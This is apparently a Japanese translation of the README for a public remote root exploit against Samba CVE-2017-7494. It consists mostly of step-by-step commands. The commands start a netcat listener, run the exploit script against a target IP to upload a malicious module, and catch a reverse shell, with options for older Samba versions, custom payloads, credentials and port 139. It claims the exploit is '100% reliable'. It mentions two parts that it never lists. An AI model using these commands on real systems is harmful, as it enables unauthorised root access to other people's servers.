
SAMBA CVE-2017-7494 の脆弱性に対するリモートルートエクスプロイト
SAMBA CVE-2017-7494 脆弱性に対するリモートルートエクスプロイト。
このエクスプロイトは2つの部分に分かれています:
ターゲットが脆弱であり、ペイロードがターゲットのオペレーティングシステムとアーキテクチャに正しい限り、エクスプロイトは100%信頼性があります。
あなたのマシンで、以下のコマンドを実行します:
$ nc -p 31337 -l
その後、ターゲットに対してエクスプロイトを実行し、Netcat に接続が戻ってくるのを待ちます:
$ python cve_2017_7494.py -t target_ip
リバースシェルを早く閉じすぎた場合、エクスプロイトを再実行してモジュールをアップロードする代わりに、すでにアップロードされたモジュールへのパスを渡すことができます。 /shared/directory/ に "module.so" としてアップロードされたと仮定すると、次のようなコマンドを実行します:
$ python cve_2017_7494.py -t target_ip -m /shared/directory/module.so
samba 3.5.0 および 3.6.0 に対してエクスプロイトを実行できるようになりました。引数 -o 1 を追加するだけです。
python cve_2017_7494.py -t target_ip -u test -P 123456 --rhost shell_ip --rport shell_port -o 1
独自のカスタム .so を使用できるようになりました。
python cve_2017_7494.py -t target_ip -u test -P 123456 -o 1 --custom myso.so
このスクリプトを x86 マシンから実行する必要がある場合、インプラントバイナリのコンパイルにより2つの x86 ファイルが作成されます。フラグ -n 1 を使用すると、コンパイルを無効にし、別のマシンから libimplantx64.so をコピーできます。
python cve_2017_7494.py -t target_ip -u test -P 123456 --rhost shell_ip --rport shell_port -n 1
samba がポート 139 のみで動作している場合。引数 -p を使用してリモートサーバーのポートを設定できます。
python cve_2017_7494.py -t target_ip -p 139 -u test -P 123456 --rhost shell_ip --rport shell_port -n 1
私はもうサポートしていません。
-- Joxean Koret